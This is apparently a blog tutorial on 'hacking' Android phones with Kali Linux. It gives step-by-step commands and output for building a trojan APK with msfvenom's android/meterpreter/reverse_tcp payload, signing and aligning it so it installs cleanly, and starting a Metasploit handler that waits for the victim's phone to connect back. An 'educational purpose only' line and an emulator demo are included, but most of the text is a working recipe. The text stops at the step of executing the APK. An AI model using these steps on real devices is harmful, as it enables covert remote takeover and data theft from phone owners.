Quick Guide: How To hack android with Kali Linux

---

In my earlier Post you we have learned how to hack windows using Kali Linux. This time we are going to hack android with Kali Linux. We are making use of msfvenom tool within Kali linux which is best combination of Msfpayload and Msfencode.

---

NOTE:  This tutorial is for educational purpose only.

Prerequisite for Hack Android

1. Kali Linux
2. Android Phone : For demonstration purpose we have used Android emulator provided by Google.

Steps to hack Android

1.  Create Payload

To create Trojan for the android hack we need to create payload using msfvenom utility with Kali linux.

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.202.128 LPORT=4444 R > /root/Desktop/my0704.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9485 bytes

In the above command LHOST ip specified is used within the ifconfig command from Kali Linux.

The above command create trojan apk file which can be installed on the target phone to exploit , however before this we need to sign this apk for proper installation. Follow below list of steps for the same.

a. Create Keystore:

root@kali:~# keytool -genkey -v -keystore my-release-key.Keystore -alias app -keyalg RSA -keysize 2048 -validity 10000

Above command asks about the list of question and password.

b. Sign the created apk file using jarsigner.

root@kali:~# jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore /root/Desktop/my0704.apk app
Enter Passphrase for keystore:
adding: META-INF/APP.SF
adding: META-INF/APP.RSA
signing: classes.dex
signing: AndroidManifest.xml
signing: resources.arsc
jar signed.

Warning:
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-08-21) or after any future revocation date.

c. Verify the apk created using jarsigner.

root@kali:~# jarsigner -verify -verbose -certs /root/Desktop/my0704.apk

d. Optimize the apk file using zipalign.

Before proceeding,  install zipalign using command below:

apt-get install zipalign

Now lets optimize the apk.

root@kali:~# zipalign -v 4 /root/Desktop/my0704.apk /root/Desktop/my0704_sign.apk
Verifying alignment of /root/Desktop/my0704_sign.apk (4)...
50 META-INF/MANIFEST.MF (OK - compressed)
281 META-INF/APP.SF (OK - compressed)
623 META-INF/APP.RSA (OK - compressed)
1752 META-INF/ (OK)
1802 META-INF/SIGNFILE.SF (OK - compressed)
2087 META-INF/SIGNFILE.RSA (OK - compressed)
2750 classes.dex (OK - compressed)
8726 AndroidManifest.xml (OK - compressed)
10443 resources.arsc (OK - compressed)
Verification successful

So our final apk which we are using to hack android is named as “my0704_sign.apk”.

2. Start the msfconsole on Kali Linux for exploiting the android phone.

root@kali:~# msfconsole

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             http://metasploit.com


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.12.22-dev                         ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

In the above msf prompt launch the android payload and multi handler exploit using commands below:

msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) >

In the command below we are using Kali linux ip for exploit can be taken from ifconfig command on Kali Linux. Also we are using port number 4444 for exploit.

msf exploit(handler) > set LHOST 192.168.202.128
LHOST => 192.168.202.128
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) >

And then give finally exploit command which will wait till execution of apk on the android phone.

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.202.128:4444
[*] Starting the payload handler...

Execution of apk on android.

Here we are using the Android emulator provided by Google. Hence you need to download the ISO image from this website.

Once downloaded you can create normal virtual machine in vmware and mount this iso on vm to start the vm machine. Setup android vm using your gmail id.